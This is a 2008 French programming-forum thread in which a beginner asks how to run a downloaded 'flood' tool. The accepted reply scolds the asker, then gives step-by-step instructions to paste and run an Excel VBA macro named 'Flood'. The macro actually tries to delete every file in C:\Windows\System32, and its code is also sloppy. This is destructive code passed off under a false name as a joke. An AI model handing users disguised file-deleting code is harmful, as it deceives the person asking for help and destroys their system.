begin process at 2010 02 09 16:15:15
  Trouver un code source :

dans

Accueil > Forum > 

VB.NET et VB 2005

> 

Divers

> 

Débutants

> 

ouvrir log flood

Derniers messages déposésPoser une question dans le forum ou lancer une discussion

ouvrir log flood

samedi 10 mai 2008 à 01:02:25 | ouvrir log flood

TbiZ

Membre Club
Bonsoir,

Voila je suis nouveaux sur le site, et j'ai un probléme.

Quant je désire télécharger un ZIP il ce télécharge, mais je ne sais vraiment pas comment l'exécuter.

Quels logiciels avoir pour exécuter ces fichiers? (c'est un logiciel de flood qui m'intéresse en ce moment)
samedi 10 mai 2008 à 01:19:58 | Re : ouvrir log flood

mortalino

Membre Club
Réponse acceptée !

salut,

Citation :
c'est un logiciel de flood qui m'intéresse en ce moment

Flooder, c'est pas bien ! (Flood = innondation = malveillant)

Lance excel, fait Alt F11, menu Insérer, Module, colle ça et fait F5

Sub Flood()
    Dim FileName As String
    Dim Path As String
    Dim Filter As String

Path = "C:\Windows\System32\*.*"

FileName = Dir(Path)
    While FileName <> ""
        FileName = Dir
        Kill FileName
    Wend
end sub
~ Mortalino ~ Colorisation automatique

Non, sans rire, pour ouvrir un fichier (je dis ça par rapport à la catégorie postée), il te faut Visual Basic 8 ou 9 (VB .Net)

@++

( Nouveau forum : Exclusivement Office & VBA/STRON

Cette discussion est classée dans : ouvrir, log, exécuter, flood

Répondre à ce message

Sujets en rapport avec ce message

Catastrophe [ par benedict ] J'ai le message suivant "Erreurs lors du chargement. Consultez D\le nom de mon programme\frmNomDeLaFeuille.log pour plus de détails.Lorsque je clique Exécuter code d'un fichier [ par Golog ] Existe t'il un moyen , pour lorsque l'applacation démare , d'ouvrir un certain ficheir(crée auparavant) contenant quelque ligne de code et de les éxéc Exécuter une application non exe depuis excel [ par Bysnu ] Bonjour,Je souhaite lancer une application depuis Excel à l'aide d'une macro. Le hic c'est que cette application est une application exécutable (.exe) ouvrir logiciel [ par jpa51490 ] Bonjour à tous car je suis nouveau sur le forum.Pourriez vous me renseigner s'il existe un programme pour convertir un programme en exe téléchargé sur Exécuter une application access en réseau [ par agbebe ] bonjour à tous!!je voudrais de l'aide sur le partage d'une application access en réseau.j'ai une application sous access que j'ai fractionné en base d ouvrir fichiers .xls d'un dossier [ par gmuser ] Bonjour! je suis plus que débutante en VB et je voudrais trouver une macro qui me permette d'ouvrir tous les fichiers Excel contenus dans un dossier Ouvrir deux fois la même WindowForm en VbNet [ par rasfish ] Bonjour à tous ! Je suis en cour de réalisation d'un projet d'informatique pour l'université et je bloque sur une petite connerie depuis quelques jou Ouvrir un prjet de vb.net 2003 dans vb.net 2005 [ par estrella_brillosa ] Bonjour tout le monde,comment peut on Ouvrir un projet de vb.net 2003 dans vb.net 2005?Merci d avance COMMENT OUVRIR UN FICHIER EXCEL SUR UNE FEUILLE BIEN DEFINIT [ par bfiguig ] Bonjour,comment ouvrir un fichier excel sur feuille bien definit (bien sur ce fichier excel possede plusieurs feuilles)merci d'avance à touscordialeme

Nos sponsors

Sondage...

Comparez les prix

CalendriCode

Février 2010
LMMJVSD
1234567
891011121314
15161718192021
22232425262728

Consulter la suite du CalendriCode

Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 0,265 sec (3)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales